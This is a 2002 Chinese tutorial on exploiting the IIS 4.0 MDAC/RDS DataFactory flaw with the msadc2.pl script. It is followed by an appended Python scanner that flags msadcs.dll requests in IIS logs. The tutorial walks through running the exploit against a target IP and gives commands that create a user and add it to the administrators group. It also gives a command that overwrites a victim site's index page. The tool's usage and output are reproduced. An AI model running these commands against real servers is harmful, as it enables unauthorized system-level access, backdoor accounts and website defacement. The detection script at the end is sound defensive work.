How to use the msadcs.dll vulnerability

If you have confirmed that the target system is NT 4.0, download ActivePerl from the "调试与工具" (debugging and tools) section of http://hoowa.tab.net.cn/, then locate the program "MSADC2.PL" in Fluxay (流光) and begin (where 目标IP / 目标机 stands for the target's IP address):

    C:\Perl\BIN>perl MSADC2.PL -h 目标IP

On success the prompt cmd /c appears. At that point you can enter:

    cmd /c net user jk jkok /add

and then:

    C:\Perl\BIN>perl MSADC2.PL -h 目标机
    cmd /c net localgroup administrators jk /add

This successfully adds a user named jk.

If the target system is W2K, the attack fails; the relevant information is as follows. When running c:\perl msadc2.pl -h 目标IP under DOS, cmd /c does appear, but whatever command is entered afterwards, the following output is produced:

    Step 1: Trying raw driver to btcustmr.mdb
    winnt -> c: d: e: f: g: h:
    winnt35 -> c: d: e: f: g: h:
    winnt351 -> c: d: e: f: g: h:
    win -> c: d: e: f: g: h:
    windows -> c: d: e: f: g: h:
    Step 2: Trying to make our own DSN...
    Making DSN: c: <<fail>>
    Step 3: Trying known DSNs..................
    Step 4: Trying known .mdbs......................................................
    ................................................................................
    ................................................................................
    ............................................
    No luck, guess you'll have to use a real hack, eh?

Step 2 (making the DSN) always fails.

Background on this vulnerability:

Name: msadc

Description: The MDAC component of IIS 4.0 contains a vulnerability that allows an attacker to remotely execute commands on your system. The core problem lies in RDS DataFactory, which by default allows remote commands to be sent to the IIS server; these commands run under the identity of the server's user, which by default is usually the SYSTEM user.

The exploit program is "msadc2.pl"; its help output looks like this:

    [quack@chat quack]$ perl msadc2.pl -h
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Usage: msadc.pl -h <host> { -d <delay> -X -v }
    -h <host> = host you want to scan (ip or domain)
    -d <seconds> = delay between calls, default 1 second
    -X = dump Index Server path table, if available
    -N = query VbBusObj for NetBIOS name
    -V = use VbBusObj instead of ActiveDataFactory
    -v = verbose
    -e = external dictionary file for step 5
    -u <\\host\share\file> = use UNC file
    -w = Windows 95 instead of Windows NT
    -c = v1 compatibility (three step query)
    -s <number> = run only step <number>
    Or a -R will resume a (v2) command session

    [quack@chat quack]$ perl msadc2.pl -h www.targe.com
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Type the command line you want to run (cmd /c assumed):
    cmd /c

Once cmd /c appears, type the command line directly and it will execute with SYSTEM privileges. For example, as xundi taught:

    echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
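A defender-side complement to the description above, added here and not part of the original page: a small Python scanner over IIS W3C extended log lines that flags requests to the RDS DataFactory endpoint (msadcs.dll) that msadc2.pl drives, and counts POSTs per client so that the step-by-step probing shows up as a burst from one address. The log lines are constructed samples, and the /msadc/ virtual directory path is an assumption (the page names only the DLL).

```python
import re
from collections import Counter
from typing import Dict, List

# The RDS DataFactory endpoint that msadc2.pl talks to. The page names only
# msadcs.dll; the /msadc/ directory is the assumed default IIS 4.0 location.
RDS_ENDPOINT = re.compile(r"/msadc/msadcs\.dll$", re.IGNORECASE)

# W3C extended format, fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Constructed sample log (not real traffic): one client POSTs to msadcs.dll
# twice, another probes the DLL with a GET in upper case.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-03-01 10:15:02 10.0.0.5 GET /default.htm - 200
2002-03-01 10:15:09 10.0.0.9 POST /msadc/msadcs.dll - 200
2002-03-01 10:15:10 10.0.0.9 POST /msadc/msadcs.dll - 200
2002-03-01 10:16:30 10.0.0.11 GET /MSADC/MSADCS.DLL - 200
2002-03-01 10:17:00 10.0.0.7 GET /images/logo.gif - 304
"""


def parse_line(line: str) -> Dict[str, str]:
    """Return the named fields of one log line, or {} if it does not parse."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else {}


def find_rds_requests(log_text: str) -> List[Dict[str, str]]:
    """Return every parsed request whose URI stem is the RDS DataFactory endpoint."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue  # blank lines and W3C header/comment lines
        rec = parse_line(line)
        if rec and RDS_ENDPOINT.search(rec["stem"]):
            hits.append(rec)
    return hits


def rds_posts_per_client(log_text: str) -> Dict[str, int]:
    """Count POSTs to msadcs.dll per client IP; RDS queries arrive as POSTs."""
    posts = Counter(h["ip"] for h in find_rds_requests(log_text)
                    if h["method"].upper() == "POST")
    return dict(posts)
```

Any POST to this endpoint from the Internet deserves attention on a server that does not intentionally expose RDS; the per-client count is what separates a scanner run from a single stray request.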
Copyright 「黑白网络工作室」 2002. All Rights Reserved.